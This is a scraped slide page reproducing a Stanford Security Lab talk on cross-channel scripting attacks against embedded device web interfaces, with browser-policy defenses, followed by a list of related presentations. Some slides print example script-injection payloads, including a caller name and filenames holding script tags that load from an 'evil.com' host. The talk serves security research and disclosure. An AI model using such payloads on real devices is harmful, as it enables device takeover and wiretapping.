cross channel scripting
play

Cross-Channel Scripting e t u p m Impact on Embedded Web - PowerPoint PPT Presentation

Dec 03, 2023 •397 likes •1.09k views

b a L y t i r u c e S r Cross-Channel Scripting e t u p m Impact on Embedded Web Interfaces o C d r o f Hristo Bojinov Elie Bursztein Dan Boneh n a Stanford Computer Security Lab t S Cross-channel scripting

  1. b a L y t i r u c e S r Cross-Channel Scripting e t u p m Impact on Embedded Web Interfaces o C d r o f Hristo Bojinov Elie Bursztein Dan Boneh n a Stanford Computer Security Lab t S

  2. Cross-channel scripting Vulnerable System Service A Service B State Protocol A Protocol B

  3. Cross-channel scripting Vulnerable System Injection Service A Service B State Protocol A Protocol A Protocol B e.g. iCal

  4. Cross-channel scripting Vulnerable System Injection Service A Service B State Protocol A Protocol A Protocol B e.g. iCal

  5. Cross-channel scripting Vulnerable System Injection Service A Service B State Protocol A Protocol A Protocol B e.g. iCal

  6. Cross-channel scripting Vulnerable System Injection Execution Service A Service B State Protocol A Protocol A Protocol B Protocol B e.g. iCal e.g. HTTP

  7. Cross-channel scripting Vulnerable System Injection Execution Service A Service B State Protocol A Protocol A Protocol B Protocol B e.g. iCal e.g. HTTP XCS: a pervasive attack class ‣ secure services ≠ secure system

  8. Cross-channel scripting LaCie Ethernet disk mini ‣ Share access control ‣ Web interface ‣ Public FTP

  9. Cross-channel scripting FTP server NAS Upload a file: <script>..</script>.pdf Attacker

  10. Cross-channel scripting FTP file server system NAS Upload a file: <script>..</script>.pdf Attacker

  11. Cross-channel scripting FTP file Web server system App NAS Upload a file: Reflect the filename: <script>..</script>.pdf <script>..</script>.pdf Attacker Admin Browser Admin Browser

  12. Cross-channel scripting

  13. Talk overview Part 1: Many examples of XCS ‣ Phones: 5 XCS vulnerabilities in 2 phones ‣ Embedded: 23 devices, 26 XCS vulnerabilities ‣ RESTful APIs: 2 major APIs, 2 XCS vulnerabilities

  14. Talk overview Part 1: Many examples of XCS ‣ Phones: 5 XCS vulnerabilities in 2 phones ‣ Embedded: 23 devices, 26 XCS vulnerabilities ‣ RESTful APIs: 2 major APIs, 2 XCS vulnerabilities Part 2: Defenses against XCS

  15. More XCS Examples e c u r i t y L a b n f o r d C o m p u t e r S S t a

  16. Embedded web interfaces?

  17. Embedded vs. public web servers Growth 300 Internet Embedded (NAS and photo frame only) 225 ) s n o 150 i l l i M ( 75 0 2008 2009 2010 2011 2012 2013 Data : - Parks associates - Netcraft

  18. Web management interfaces Managing embedded devices via a web interface: ✓ Easier for users ✓ Cheaper for vendors

  19. Recipe for a disaster Vendors build their own web applications Standard web server (sometimes) ‣ Custom web application stack ‣ Weak web security ‣ New features/services added at a fast pace Vendors compete on number of services in product ‣ Interactions between services ➽ vulnerabilities ‣

  20. Outcome Vulnerabilities in every device we audited

  21. SIP XCS VoIP phone ‣ Linksys SPA942 ‣ Web interface ‣ SIP support ‣ Call logs

  22. SIP XCS

  23. SIP XCS 1 Attacker makes a call as “<script src="//evil.com/"></script>”

  24. SIP XCS 1 Attacker makes a call as “<script src="//evil.com/"></script>” 2 Administrator accesses web interface

  25. SIP XCS 1 Attacker makes a call as “<script src="//evil.com/"></script>” 2 Administrator accesses web interface Internet 3 Payload executes

  26. SIP XCS Outcome: phone reconfiguration, VoIP wiretapping...

  27. Photo frame XCS WiFi photo frame ‣ Samsung SPF85V ‣ RSS / URL feed ‣ Windows Live ‣ WMV / AVI

  28. Photo frame XCS Internet

  29. Photo frame XCS 1 Attacker infects via CSRF Internet

  30. Photo frame XCS 1 Attacker infects via CSRF Internet 2 User connects to manage

  31. Photo frame XCS 1 Attacker infects via CSRF Internet Frame Error! 3 Payload executes Call Support: 1-900-PWNED 2 User connects to manage

  32. Devices as stepping stones

  33. Devices as stepping stones 1 Administer the device

  34. Devices as stepping stones 1 Administer the device 2 Browse internet Internet

  35. Devices as stepping stones 1 Administer the device 2 Browse internet Internet P O S T ( e . g . v i a A d s ) 3 T r i g g e r

  36. Devices as stepping stones 4 Infect the device 2 Browse internet Internet P O S T ( e . g . v i a A d s ) 3 T r i g g e r

  37. Devices as stepping stones 5 Access files

  38. Devices as stepping stones 6 Send malicious payload 5 Access files

  39. Devices as stepping stones 6 Send malicious payload 5 Access files 7 Attack local network

  40. Another boring NAS device? SOHO NAS ‣ Buffalo LS-CHL ‣ BitTorrent support!

  41. Massive exploitation Internet

  42. Massive exploitation Create a bad torrent Internet Famous_movie.torrent

  43. Massive exploitation Internet

  44. Massive exploitation Internet

  45. Massive exploitation Internet

  46. Peer-to-peer XCS!

  47. Defenses e c u r i t y L a b n f o r d C o m p u t e r S S t a

  48. Cross-channel scripting Vulnerable System Injection Execution Service A Service B Protocol A Protocol A Protocol B Protocol B

  49. Cross-channel scripting Vulnerable System Injection Execution Service A Service B Protocol A Protocol A Protocol B Protocol B Difficult

  50. Cross-channel scripting Vulnerable System Injection Execution Service A Service B Protocol A Protocol A Protocol B Protocol B Difficult Feasible

  51. Security policies in browsers

  52. Security policies in browsers Strict Transport Security ‣ ForceHTTPS [JB’08] ‣ Stateful, and site-wide ‣ Recently adopted by PayPal ‣ Several browser implementations

  53. Security policies in browsers Same Origin Mutual Approval [OWvOS’08] ‣ Manifest delivery, stateless, site-wide

  54. Security policies in browsers Same Origin Mutual Approval [OWvOS’08] ‣ Manifest delivery, stateless, site-wide Mozilla Content Security Policy ‣ Header delivery, stateless, fine-grained

  55. Security policies in browsers Same Origin Mutual Approval [OWvOS’08] ‣ Manifest delivery, stateless, site-wide Mozilla Content Security Policy ‣ Header delivery, stateless, fine-grained SiteFirewall ‣ Header delivery, stateful, site-wide

  56. SiteFirewall SiteFirewall (a Firefox extension), prevents internal websites from accessing the Internet. Internet

  57. SiteFirewall SiteFirewall (a Firefox extension), prevents internal websites from accessing the Internet. Internet

  58. SiteFirewall Injected script can issue requests at will: <script src=”http://evil.com”> Before

  59. SiteFirewall Page interactions with the Internet blocked. After

  60. Thinking beyond cookies

  61. Thinking beyond cookies Policy delivery mechanisms: ‣ Manifest files, cookies, custom headers, DNS, certs

  62. Thinking beyond cookies Policy delivery mechanisms: ‣ Manifest files, cookies, custom headers, DNS, certs Different types of browser state: ‣ Cookies for web application state ‣ Policy store for web site security policies

  63. Conclusion e c u r i t y L a b n f o r d C o m p u t e r S S t a

  64. A growing threat As seen on Twitter...

  65. A growing threat ... and a smartphone near you.

  66. Conclusion Rise of multi-protocol devices: XCS Rise of browser-OS: 24x7 exploitability Thanks to Eric Lovett and Parks Associates!

  67. Conclusion Rise of multi-protocol devices: XCS Rise of browser-OS: 24x7 exploitability Recommendations ‣ HTTP: cross-site policy standard ‣ Browser: security policy store (non-cookie) Thanks to Eric Lovett and Parks Associates!

  68. Questions? b a L y t i r u c e S r e t u p m o C d r o f n a t S http://seclab.stanford.edu

Recommend

Cross-Site Scripting Attack (XSS) Outline The Cross-Site Scripting attack Reflected

Cross-Site Scripting Attack (XSS) Outline The Cross-Site Scripting attack Reflected

Cross-Site Scripting Attack (XSS) Outline The Cross-Site Scripting attack Reflected XSS Persistent XSS Damage done by XSS attacks XSS attacks to befriend with others XSS attacks to change other peoples

3.65k views • 37 slides
Don't Trust The Locals: Exploiting Persistent Client-Side Cross-Site Scripting in the Wild Marius

Don't Trust The Locals: Exploiting Persistent Client-Side Cross-Site Scripting in the Wild Marius

Don't Trust The Locals: Exploiting Persistent Client-Side Cross-Site Scripting in the Wild Marius Ste ff ens German OWASP Day 2018 joint work with Christian Rossow, Martin Johns and Ben Stock Dimensions of Cross-Site Scripting Server Client

413 views • 14 slides
Document Structure Integrity: A Robust Basis for Cross-Site Scripting Defense Yacin Nadji

Document Structure Integrity: A Robust Basis for Cross-Site Scripting Defense Yacin Nadji

Document Structure Integrity: A Robust Basis for Cross-Site Scripting Defense Yacin Nadji Prateek Saxena Dawn Song Illinois Institute UC Berkeley UC Berkeley Of Technology 1 A Cross-Site Scripting Attack Hi Joe, &lt;img src=&gt;

569 views • 42 slides
SQL Injection Last Few Lectures XSS - Cross-site scripting XSRF/CSRF - Cross-site request

SQL Injection Last Few Lectures XSS - Cross-site scripting XSRF/CSRF - Cross-site request

SQL Injection Last Few Lectures XSS - Cross-site scripting XSRF/CSRF - Cross-site request forgery Code Injection Attacks Attacker executes arbitrary code on server Programming the program Not sanitizing user

287 views • 11 slides
The DOM Scripting Toolkit: jQuery Remy Sharp Left Logic Why JS Libraries? DOM scripting

The DOM Scripting Toolkit: jQuery Remy Sharp Left Logic Why JS Libraries? DOM scripting

The DOM Scripting Toolkit: jQuery Remy Sharp Left Logic Why JS Libraries? DOM scripting made easy Why JS Libraries? DOM scripting made easy Cross browser work done for you Why JS Libraries? DOM scripting made easy Cross

1.46k views • 92 slides
Lecture 17: Scripting and Steering David Bindel 28 Mar 2010 Overview of today Scripting

Lecture 17: Scripting and Steering David Bindel 28 Mar 2010 Overview of today Scripting

Lecture 17: Scripting and Steering David Bindel 28 Mar 2010 Overview of today Scripting sales pitch + typical uses in scientific code Truth in advertising Cross-language communication mechanisms Tool support Some simple

336 views • 21 slides
Web Security, Summer Term 2012 Cross Site Scripting - XSS Dr. E. Benoist Sommer Semester Web

Web Security, Summer Term 2012 Cross Site Scripting - XSS Dr. E. Benoist Sommer Semester Web

IIG University of Freiburg Web Security, Summer Term 2012 Cross Site Scripting - XSS Dr. E. Benoist Sommer Semester Web Security, Summer Term 2012 5 Cross Site Scripting 1 Table of Contents Presentation: Inject Javascript in a Page

506 views • 26 slides
Outline Cross-site scripting CSci 5271 More cross-site risks Introduction to Computer Security

Outline Cross-site scripting CSci 5271 More cross-site risks Introduction to Computer Security

Outline Cross-site scripting CSci 5271 More cross-site risks Introduction to Computer Security Web security, part 2 Announcements intermission Stephen McCamant Confidentiality and privacy University of Minnesota, Computer Science &amp;

892 views • 6 slides
Outline Cross-site scripting Announcements intermission CSci 5271 More cross-site risks

Outline Cross-site scripting Announcements intermission CSci 5271 More cross-site risks

Outline Cross-site scripting Announcements intermission CSci 5271 More cross-site risks Introduction to Computer Security Confidentiality and privacy Day 19: Web security, part 2 Stephen McCamant Even more web risks University of

386 views • 11 slides
Outline Cross-site scripting, contd More cross-site risks CSci 5271 Introduction to Computer

Outline Cross-site scripting, contd More cross-site risks CSci 5271 Introduction to Computer

Outline Cross-site scripting, contd More cross-site risks CSci 5271 Introduction to Computer Security Announcements intermission Web security and crypto failure combined Confidentiality and privacy lecture Even more web risks Stephen

435 views • 10 slides
Writing Secure Code Wash all user-submitted data Vulnerabilities XSS - Cross-site scripting

Writing Secure Code Wash all user-submitted data Vulnerabilities XSS - Cross-site scripting

Writing Secure Code Wash all user-submitted data Vulnerabilities XSS - Cross-site scripting Executing unauthorized code XSRF - Cross-site request forgery Remote execution for logged-in users SQL Injection A malicious variable placed into a

681 views • 18 slides
Cyber@UC Meeting 43 Cross-site scripting (XSS) CEH Cryptography and Recon If Youre New!

Cyber@UC Meeting 43 Cross-site scripting (XSS) CEH Cryptography and Recon If Youre New!

Cyber@UC Meeting 43 Cross-site scripting (XSS) CEH Cryptography and Recon If Youre New! Join our Slack ucyber.slack.com SIGN IN! Feel free to get involved with one of our committees: Content, Finance, Public Affairs, Outreach,

560 views • 26 slides
CROSS SITE SCRIPTING (XSS) ATTACKS Injection attacks 3/18/19 1 Whoami Ad Adam Nu Nurudin

CROSS SITE SCRIPTING (XSS) ATTACKS Injection attacks 3/18/19 1 Whoami Ad Adam Nu Nurudin

CROSS SITE SCRIPTING (XSS) ATTACKS Injection attacks 3/18/19 1 Whoami Ad Adam Nu Nurudin ini CEH, ITIL L V3, 3, CCNA, CCNP, CASP, PCI-DS DSS.. .. Lead Security Researcher @ Netwatch Technologies Project Consultant, Information

377 views • 20 slides
Cross-Site Scripting XSS Many sites allow users to upload information Blogs, photo

Cross-Site Scripting XSS Many sites allow users to upload information Blogs, photo

Cross-Site Scripting XSS Many sites allow users to upload information Blogs, photo sharing, Facebook, etc. Which gets permanently stored And displayed Attack based on uploading a script Other users inadvertently download

428 views • 14 slides
Cross-Site Scripting XSS Many sites allow users to upload information Blogs, photo

Cross-Site Scripting XSS Many sites allow users to upload information Blogs, photo

Cross-Site Scripting XSS Many sites allow users to upload information Blogs, photo sharing, Facebook, etc. Which gets permanently stored And displayed Attack based on uploading a script Other users inadvertently download

512 views • 15 slides
A3: Cross-site Scripting (XSS) (JavaScript injection) Prevalence Stock et.al. How the Web

A3: Cross-site Scripting (XSS) (JavaScript injection) Prevalence Stock et.al. How the Web

A3: Cross-site Scripting (XSS) (JavaScript injection) Prevalence Stock et.al. How the Web Tangled Itself: Uncovering the History of Client- Side Web (In)Security, USENIX Security 2017 But first..JavaScript security Pages now loaded

482 views • 46 slides
Cross-Site Scripting: analysis, identification and exploitation Mauro Gentile Web Application

Cross-Site Scripting: analysis, identification and exploitation Mauro Gentile Web Application

Cross-Site Scripting: analysis, identification and exploitation Mauro Gentile Web Application Security course (Elective in Computer Networks) prof. Fabrizio d'Amore Dept. of Computer, Control, and Management Engineering Antonio Ruberti

729 views • 28 slides
Hacking Web Sites Cross Site Scripting Emmanuel Benoist Fall Term 2020/2021 Berner

Hacking Web Sites Cross Site Scripting Emmanuel Benoist Fall Term 2020/2021 Berner

Hacking Web Sites Cross Site Scripting Emmanuel Benoist Fall Term 2020/2021 Berner Fachhochschule | Haute ecole sp ecialis ee bernoise | Berne University of Applied Sciences 1 Table of Contents Presentation Stored XSS Reflected

792 views • 50 slides
Web Security: Vulnerabilities &amp; Attacks Dawn Song Cross-site Scripting Dawn Song What is

Web Security: Vulnerabilities &amp; Attacks Dawn Song Cross-site Scripting Dawn Song What is

Computer Security Course. Dawn Computer Security Course. Dawn Song Song Web Security: Vulnerabilities &amp; Attacks Dawn Song Cross-site Scripting Dawn Song What is Cross-site Scripting (XSS)? Vulnerability in web application that

760 views • 53 slides
Cross-Site Scripting (XSS) Professor Larry Heimann Web Application Security Information Systems

Cross-Site Scripting (XSS) Professor Larry Heimann Web Application Security Information Systems

Cross-Site Scripting (XSS) Professor Larry Heimann Web Application Security Information Systems Browser same origin policy Key security principle: a web browser permits scripts contained in a first web page to access data in a second web page,

1.12k views • 25 slides
Cross-Site Scripting (XSS) Professor Larry Heimann Web Application Security Information Systems

Cross-Site Scripting (XSS) Professor Larry Heimann Web Application Security Information Systems

Cross-Site Scripting (XSS) Professor Larry Heimann Web Application Security Information Systems Browser same origin policy Key security principle: a web browser permits scripts contained in a first web page to access data in a second web page,

358 views • 22 slides
Brent Burgess Head of Digital and Marketing Technology Enabling cross channel marketing through

Brent Burgess Head of Digital and Marketing Technology Enabling cross channel marketing through

Brent Burgess Head of Digital and Marketing Technology Enabling cross channel marketing through data May 2017 14 Brands 5 Countries Ambition Digital Transformation Customers New offerings, Data Hearts and right channel, Minds

239 views • 11 slides
Server-side Web Security: Cross-Site Scripting CS 161: Computer Security Prof. Raluca Ada Popa

Server-side Web Security: Cross-Site Scripting CS 161: Computer Security Prof. Raluca Ada Popa

Server-side Web Security: Cross-Site Scripting CS 161: Computer Security Prof. Raluca Ada Popa February 9, 2016 Top web vulnerabilities OWASP Top 10

719 views • 49 slides
TatooineMesher: Anisotropic interpolation from 1D cross-sections and 2D channel mesher

TatooineMesher: Anisotropic interpolation from 1D cross-sections and 2D channel mesher

TatooineMesher: Anisotropic interpolation from 1D cross-sections and 2D channel mesher 17/09/2019, Toulouse (France) L. DURON, F.-X. CIERCO, K. SAAD Telemac User Conference 2019 Table of contents Introduction Mesh generation Principle - Step

991 views • 37 slides

More recommend